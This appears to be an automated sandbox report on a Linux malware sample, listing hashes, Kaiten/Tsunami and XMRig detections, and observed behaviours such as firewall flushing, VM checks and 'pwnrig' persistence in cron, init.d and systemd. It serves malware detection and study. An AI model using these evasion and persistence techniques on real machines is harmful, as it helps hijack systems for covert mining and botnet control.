Analysis
-
max time kernel
146s -
max time network
151s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
26-10-2024 13:10
Behavioral task
behavioral1
Sample
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
Resource
ubuntu2004-amd64-20240611-en
General
-
Target
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
-
Size
7.0MB
-
MD5
c91421f0d68095890b50a034dbf9d060
-
SHA1
624e0d9c94309de8d038b2e21cf07685d2020fdb
-
SHA256
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
-
SHA512
63d174cf0ba590aa836a9c4490ef7982d7590d8fcf9f67b8a8021dc23755a4aecf16805a12679e566d6d6bec45a4d3344d62197a7f3c6660c46812594888bd88
-
SSDEEP
49152:FdvgYnvuqgrb/TGvO90dL3BmAFd4A64nsfJYgJi1QjpzkpDKzBzQgQHDSZ/+/A5X:YqpgxDFnEqZJvlNiPt9y7LxXk5prrT
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 13 IoCs
resource yara_rule behavioral1/memory/2079-3-0x00007f4134858000-0x00007f413486c700-memory.dmp family_kaiten2 behavioral1/memory/2088-4-0x00007ff117c12000-0x00007ff117c26700-memory.dmp family_kaiten2 behavioral1/memory/2533-7-0x00007fc5ad3f2000-0x00007fc5ad406700-memory.dmp family_kaiten2 behavioral1/memory/2965-10-0x00007fd01a268000-0x00007fd01a27c700-memory.dmp family_kaiten2 behavioral1/memory/3429-13-0x00007f4bced46000-0x00007f4bced5a700-memory.dmp family_kaiten2 behavioral1/memory/3873-16-0x00007fd054c54000-0x00007fd054c68700-memory.dmp family_kaiten2 behavioral1/memory/4303-19-0x00007fbf5e30e000-0x00007fbf5e322700-memory.dmp family_kaiten2 behavioral1/memory/4747-22-0x00007f9c2e966000-0x00007f9c2e97a700-memory.dmp family_kaiten2 behavioral1/memory/5191-25-0x00007f6b946a1000-0x00007f6b946b5700-memory.dmp family_kaiten2 behavioral1/memory/5638-28-0x00007fe9ca191000-0x00007fe9ca1a5700-memory.dmp family_kaiten2 behavioral1/memory/6082-31-0x00007fc8b726a000-0x00007fc8b727e700-memory.dmp family_kaiten2 behavioral1/memory/6526-34-0x00007f48d5e42000-0x00007f48d5e56700-memory.dmp family_kaiten2 behavioral1/memory/6970-37-0x00007efce17cb000-0x00007efce17df700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 13 IoCs
resource yara_rule behavioral1/memory/2079-3-0x00007f4134858000-0x00007f413486c700-memory.dmp family_kaiten behavioral1/memory/2088-4-0x00007ff117c12000-0x00007ff117c26700-memory.dmp family_kaiten behavioral1/memory/2533-7-0x00007fc5ad3f2000-0x00007fc5ad406700-memory.dmp family_kaiten behavioral1/memory/2965-10-0x00007fd01a268000-0x00007fd01a27c700-memory.dmp family_kaiten behavioral1/memory/3429-13-0x00007f4bced46000-0x00007f4bced5a700-memory.dmp family_kaiten behavioral1/memory/3873-16-0x00007fd054c54000-0x00007fd054c68700-memory.dmp family_kaiten behavioral1/memory/4303-19-0x00007fbf5e30e000-0x00007fbf5e322700-memory.dmp family_kaiten behavioral1/memory/4747-22-0x00007f9c2e966000-0x00007f9c2e97a700-memory.dmp family_kaiten behavioral1/memory/5191-25-0x00007f6b946a1000-0x00007f6b946b5700-memory.dmp family_kaiten behavioral1/memory/5638-28-0x00007fe9ca191000-0x00007fe9ca1a5700-memory.dmp family_kaiten behavioral1/memory/6082-31-0x00007fc8b726a000-0x00007fc8b727e700-memory.dmp family_kaiten behavioral1/memory/6526-34-0x00007f48d5e42000-0x00007f48d5e56700-memory.dmp family_kaiten behavioral1/memory/6970-37-0x00007efce17cb000-0x00007efce17df700-memory.dmp family_kaiten -
Kaiten family
-
Xmrig family
-
XMRig Miner payload 26 IoCs
resource yara_rule behavioral1/memory/1701-1-0x00007f41946e0000-0x00007f4194d9ed40-memory.dmp xmrig behavioral1/memory/2001-2-0x00007f413894c000-0x00007f413900ad40-memory.dmp xmrig behavioral1/memory/2089-5-0x00007fa4fb901000-0x00007fa4fbfbfd40-memory.dmp xmrig behavioral1/memory/2434-6-0x00007f77ff491000-0x00007f77ffb4fd40-memory.dmp xmrig behavioral1/memory/2534-8-0x00007f614cdb7000-0x00007f614d475d40-memory.dmp xmrig behavioral1/memory/2879-9-0x00007fb51081d000-0x00007fb510edbd40-memory.dmp xmrig behavioral1/memory/2966-11-0x00007fcd89d57000-0x00007fcd8a415d40-memory.dmp xmrig behavioral1/memory/3311-12-0x00007f035218a000-0x00007f0352848d40-memory.dmp xmrig behavioral1/memory/3430-14-0x00007f138942b000-0x00007f1389ae9d40-memory.dmp xmrig behavioral1/memory/3775-15-0x00007f4731d95000-0x00007f4732453d40-memory.dmp xmrig behavioral1/memory/3874-17-0x00007f97d1d6b000-0x00007f97d2429d40-memory.dmp xmrig behavioral1/memory/4219-18-0x00007f682e93c000-0x00007f682effad40-memory.dmp xmrig behavioral1/memory/4304-20-0x00007f2792924000-0x00007f2792fe2d40-memory.dmp xmrig behavioral1/memory/4649-21-0x00007f37d18d3000-0x00007f37d1f91d40-memory.dmp xmrig behavioral1/memory/4748-23-0x00007f5e60329000-0x00007f5e609e7d40-memory.dmp xmrig behavioral1/memory/5093-24-0x00007f0e83571000-0x00007f0e83c2fd40-memory.dmp xmrig behavioral1/memory/5192-26-0x00007f5d1d11a000-0x00007f5d1d7d8d40-memory.dmp xmrig behavioral1/memory/5537-27-0x00007fa2f7da0000-0x00007fa2f845ed40-memory.dmp xmrig behavioral1/memory/5639-29-0x00007f5b6eec9000-0x00007f5b6f587d40-memory.dmp xmrig behavioral1/memory/5984-30-0x00007fc668eeb000-0x00007fc6695a9d40-memory.dmp xmrig behavioral1/memory/6083-32-0x00007f0d0b0c2000-0x00007f0d0b780d40-memory.dmp xmrig behavioral1/memory/6428-33-0x00007f32a61d9000-0x00007f32a6897d40-memory.dmp xmrig behavioral1/memory/6527-35-0x00007fbc6a23a000-0x00007fbc6a8f8d40-memory.dmp xmrig behavioral1/memory/6872-36-0x00007fc1d13cb000-0x00007fc1d1a89d40-memory.dmp xmrig behavioral1/memory/6971-38-0x00007fb5fc574000-0x00007fb5fcc32d40-memory.dmp xmrig behavioral1/memory/7316-39-0x00007f4c4cde6000-0x00007f4c4d4a4d40-memory.dmp xmrig -
File and Directory Permissions Modification 1 TTPs 39 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 6228 Process not Found 2128 sh 2679 chmod 3005 sh 3021 chmod 5678 Process not Found 1740 sh 1756 chmod 1795 chmod 2144 chmod 2234 chmod 3485 chmod 7026 Process not Found 2589 chmod 3469 sh 4803 Process not Found 4893 Process not Found 5694 Process not Found 6566 Process not Found 3913 sh 4359 Process not Found 5337 Process not Found 3111 chmod 4019 chmod 4449 Process not Found 5784 Process not Found 6138 Process not Found 6582 Process not Found 2573 sh 3929 chmod 4343 Process not Found 4787 Process not Found 5231 Process not Found 5247 Process not Found 6122 Process not Found 3575 chmod 6672 Process not Found 7010 Process not Found 7116 Process not Found -
Executes dropped EXE 40 IoCs
ioc pid Process /etc/init.d/knlib 1614 knlib /tmp/service-agent 1701 service-agent /tmp/service-agent 2001 service-agent /tmp/sys-helper 2079 sys-helper /tmp/sys-helper 2088 sys-helper /tmp/service-agent 2089 service-agent /tmp/service-agent 2434 service-agent /tmp/sys-helper 2533 sys-helper /tmp/service-agent 2534 service-agent /tmp/service-agent 2879 service-agent /tmp/sys-helper 2965 sys-helper /tmp/service-agent 2966 service-agent /tmp/service-agent 3311 service-agent /tmp/sys-helper 3429 sys-helper /tmp/service-agent 3430 service-agent /tmp/service-agent 3775 service-agent /tmp/sys-helper 3873 sys-helper /tmp/service-agent 3874 service-agent /tmp/service-agent 4219 service-agent /tmp/sys-helper 4303 Process not Found /tmp/service-agent 4304 Process not Found /tmp/service-agent 4649 Process not Found /tmp/sys-helper 4747 Process not Found /tmp/service-agent 4748 Process not Found /tmp/service-agent 5093 Process not Found /tmp/sys-helper 5191 Process not Found /tmp/service-agent 5192 Process not Found /tmp/service-agent 5537 Process not Found /tmp/sys-helper 5638 Process not Found /tmp/service-agent 5639 Process not Found /tmp/service-agent 5984 Process not Found /tmp/sys-helper 6082 Process not Found /tmp/service-agent 6083 Process not Found /tmp/service-agent 6428 Process not Found /tmp/sys-helper 6526 Process not Found /tmp/service-agent 6527 Process not Found /tmp/service-agent 6872 Process not Found /tmp/sys-helper 6970 Process not Found /tmp/service-agent 6971 Process not Found /tmp/service-agent 7316 Process not Found -
Flushes firewall rules 1 TTPs 15 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 1761 update-rc.d 5699 Process not Found 6587 Process not Found 2594 update-rc.d 3026 update-rc.d 3934 update-rc.d 6143 Process not Found 1396 ufw 2149 update-rc.d 4364 Process not Found 5252 Process not Found 7031 Process not Found 1597 iptables 3490 update-rc.d 4808 Process not Found -
ioc pid Process /usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1400 modprobe -
Reads EFI boot settings 1 TTPs 64 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
description ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 3799 sh 5842 Process not Found 6008 Process not Found 6127 Process not Found 7010 Process not Found 3860 chattr 4505 Process not Found 6073 Process not Found 6286 Process not Found 6292 Process not Found 1760 chattr 4448 Process not Found 5179 Process not Found 5401 Process not Found 5634 Process not Found 1613 chattr 5180 Process not Found 5643 Process not Found 4246 hostname 5189 Process not Found 6137 Process not Found 7179 Process not Found 6516 Process not Found 3425 chattr 3574 sed 4513 Process not Found 4807 Process not Found 6011 Process not Found 3426 chattr 4676 Process not Found 5395 Process not Found 5636 Process not Found 6576 Process not Found 7174 Process not Found 3928 sed 4741 Process not Found 5626 Process not Found 6076 Process not Found 6512 Process not Found 4353 Process not Found 5246 Process not Found 6972 Process not Found 1599 chattr 2737 chattr 3022 chattr 3859 chattr 4305 Process not Found 5633 Process not Found 6571 Process not Found 6896 Process not Found 2535 sh 3472 chattr 4018 sed 4343 Process not Found 5400 Process not Found 2143 sed 2529 chattr 4083 chattr 5177 Process not Found 5693 Process not Found 6566 Process not Found 1757 chattr 2148 chattr 3335 sh -
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /var/spool/cron/crontabs/tmp.mDK5Lj crontab File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.daily/sedoEWJ3b sed File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.weekly/sedD8jNsO Process not Found File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.monthly/sedOrn16T sed File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.monthly/sedudO77I Process not Found File opened for modification /var/spool/cron/crontabs/tmp.OIEvOZ Process not Found File opened for modification /etc/cron.hourly/sedUmorLk Process not Found File opened for modification /etc/cron.daily/sedWqS2Uh Process not Found File opened for modification /etc/cron.daily/sedqy8mfn Process not Found File opened for modification /etc/cron.daily/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.weekly/sedIsQkIi Process not Found File opened for modification /etc/cron.weekly/sedaTiNsT Process not Found File opened for modification /etc/cron.daily/pwnrig Process not Found File opened for modification /etc/cron.weekly/sed7iRwyp Process not Found File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /var/spool/cron/crontabs/tmp.AvSAUW crontab File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.monthly/sedPz9TWk Process not Found File opened for modification /var/spool/cron/crontabs/tmp.TxyZKy Process not Found File opened for modification /etc/cron.d/sed0iseHQ Process not Found File opened for modification /etc/cron.monthly/sedcFoEXf Process not Found File opened for modification /etc/cron.monthly/sed0CuEVV sed File opened for modification /var/spool/cron/crontabs/tmp.8ZbkqZ crontab File opened for modification /etc/cron.monthly/sedbnTLDQ Process not Found File opened for modification /etc/cron.d/sedTkwV5g Process not Found File opened for modification /etc/cron.weekly/sedLZMkbg Process not Found File opened for modification /etc/cron.weekly/sedM7OhNS sed File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.weekly/sedqBp5jE sed File opened for modification /var/spool/cron/crontabs/tmp.vOwVkv Process not Found File opened for modification /etc/cron.weekly/sedz9GZwL Process not Found File opened for modification /etc/cron.daily/pwnrig Process not Found File opened for modification /etc/cron.weekly/sedy9BWth sed File opened for modification /etc/cron.hourly/pwnrig Process not Found File opened for modification /etc/cron.hourly/sedY31bAg Process not Found File opened for modification /etc/cron.monthly/sedwOF3LO Process not Found File opened for modification /etc/cron.d/sedR6T5HV sed File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.d/sedsiEgQe sed File opened for modification /var/spool/cron/crontabs/tmp.rDgoux Process not Found File opened for modification /etc/cron.daily/sedvJO8qN Process not Found File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.monthly/sedY0xtKg sed File opened for modification /etc/cron.monthly/sedbCeyzA sed File opened for modification /var/spool/cron/crontabs/tmp.6dAyyj crontab File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.d/pwnrig Process not Found File opened for modification /var/spool/cron/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /etc/cron.daily/sedKgmymg sed File opened for modification /etc/cron.hourly/sedZHjEKx sed File opened for modification /etc/cron.daily/pwnrig Process not Found File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.monthly/sedeO5NLF sed File opened for modification /etc/cron.hourly/pwnrig Process not Found -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/sediPbNZA Process not Found File opened for modification /etc/init.d/sedQeWv9n sed File opened for modification /etc/init.d/sedFr125r sed File opened for modification /etc/init.d/sedn3OQn1 sed File opened for modification /etc/init.d/sedZ4MXP4 Process not Found File opened for modification /etc/init.d/sedcb1kWQ sed File opened for modification /etc/init.d/sed56LIQ4 sed File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedRT5JxH sed File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedc4XUwv Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedL3LKEF Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedQcJ9d4 Process not Found File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedHZVRcw Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedA51rlb Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/knlib 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig Process not Found -
Modifies systemd 2 TTPs 27 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/knlibe.service 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found -
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
